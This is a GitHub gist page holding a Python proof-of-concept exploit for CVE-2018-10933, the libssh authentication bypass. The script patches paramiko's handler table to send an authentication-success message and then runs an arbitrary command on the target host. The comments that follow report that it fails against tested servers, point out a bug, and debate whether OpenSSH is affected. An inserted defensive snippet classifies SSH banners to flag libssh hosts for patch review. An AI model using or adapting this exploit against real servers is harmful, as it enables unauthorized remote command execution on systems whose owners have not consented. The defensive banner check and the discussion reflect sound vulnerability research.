@mlosapio
Last active February 3, 2024 18:50
```python
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging

username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]

new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
    paramiko.common.MSG_USERAUTH_SUCCESS]


def auth_accept(*args, **kwargs):
    return new_auth_accept(*args, **kwargs)


paramiko.auth_handler.AuthHandler._handler_table.update({
    paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})

port = 22

try:
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.WarningPolicy)
    client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
    stdin, stdout, stderr = client.exec_command(command)
    print stdout.read(),
finally:
    client.close()
```

@th0j

th0j commented Oct 18, 2018

As another user pointed out, you must change:

client.set_missing_host_key_policy(paramiko.WarningPolicy)

for

client.set_missing_host_key_policy(paramiko.WarningPolicy())

I've tested the script on a known vulnerable server and it does return a paramiko.ssh_exception.AuthenticationException: Authentication failed. error. Definitively a false negative here.

I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.

I checked my server and found libssh version 0.6.3-4.3. I ran your code, but it always raises paramiko.ssh_exception.AuthenticationException: Authentication failed.

@soekarmana

From: https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
Apparently OpenSSH does not rely on libssh:

> OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.

Can anyone confirm this?

@ocean390

> From: https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
> Apparently OpenSSH does not rely on libssh:
>
> > OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.
>
> Can anyone confirm this?

Yes, libssh is an implementation of an SSH protocol server library, and OpenSSH is another implementation.
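
The libssh-versus-OpenSSH question in the comments above can usually be settled from the identification line an SSH server sends first. The following is an added example, not part of the gist or of any comment: the banner strings and addresses are constructed, and a server with a customised banner will not be recognised.

```python
import re

# RFC 4253 section 4.2 identification line: SSH-protoversion-softwareversion SP comments
IDENT_RE = re.compile(r"^SSH-(?P<proto>[^-\s]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
# libssh banners have used both "libssh-X.Y.Z" and "libssh_X.Y.Z".
# "libssh2_..." is a different, unrelated library and must not match.
LIBSSH_RE = re.compile(r"^libssh[-_](?P<version>\d+(?:\.\d+)*)")
OPENSSH_RE = re.compile(r"^OpenSSH_(?P<version>[\w.]+)")


def classify(ident_line):
    """Return (implementation, version) for an SSH identification line, or None if malformed."""
    m = IDENT_RE.match(ident_line.rstrip("\r\n"))
    if m is None:
        return None
    software = m.group("software")
    for name, pattern in (("libssh", LIBSSH_RE), ("openssh", OPENSSH_RE)):
        hit = pattern.match(software)
        if hit:
            return name, hit.group("version")
    return "other", software


def libssh_hosts(banners):
    """From {host: identification line}, list (host, version) pairs that advertise libssh."""
    found = []
    for host, line in sorted(banners.items()):
        result = classify(line)
        if result and result[0] == "libssh":
            found.append((host, result[1]))
    return found


# Constructed sample data (documentation addresses, not real hosts).
SAMPLE_BANNERS = {
    "192.0.2.10": "SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4\r\n",
    "192.0.2.11": "SSH-2.0-libssh_0.8.3\r\n",
    "192.0.2.12": "SSH-2.0-libssh-0.6.3\r\n",
    "192.0.2.13": "SSH-2.0-libssh2_1.8.0\r\n",
    "192.0.2.14": "HTTP/1.1 400 Bad Request\r\n",
}

if __name__ == "__main__":
    for host, version in libssh_hosts(SAMPLE_BANNERS):
        print(f"{host}: libssh {version} - compare against the vendor advisory's fixed releases")
```

Hosts reported here are candidates for patch review; the version still has to be checked against the libssh advisory for CVE-2018-10933, which this example does not encode.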

@qran253

qran253 commented Oct 19, 2018

What is wrong here? I installed python-paramiko.

```
root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
  File "asd.py", line 4, in <module>
    import paramiko
ModuleNotFoundError: No module named 'paramiko'
```

@rodrigobash

What am I doing wrong?


@salik89

salik89 commented Oct 2, 2020

Hi there, I chanced upon this and am wondering if you could advise whether I need an actual server before I can test this code. Or could I test it locally, e.g. in Kali via VirtualBox?
